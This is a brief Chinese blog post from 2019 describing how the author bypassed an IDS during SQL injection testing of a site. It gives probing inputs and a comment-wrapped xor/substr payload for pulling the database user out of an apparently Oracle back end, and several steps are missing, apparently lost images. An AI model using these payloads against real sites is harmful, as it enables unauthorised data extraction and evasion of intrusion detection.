记某次sql注入绕过ids

  昨天测试sql注入,发现个站,存在ids,一个单引号直接拦截,无论我怎么编码都不行,怕不是废了。。

  

 

灵机一动

基础探测

/*'*/ 报错

/*''*/ 返回正常

是字符串类型。

先本地测试

返回所有

 

返回当前

 

那么:

 

还是少用or,一个or网站直接废了。

 

 

 通过报错信息发现是oracle构造payload:

出数据:

1/*'xor if(substr(user,1,1)='*',1,0) or '*/'

 

posted @ 2019-08-01 09:10  飘渺__红尘  阅读(...)  评论(... 编辑 收藏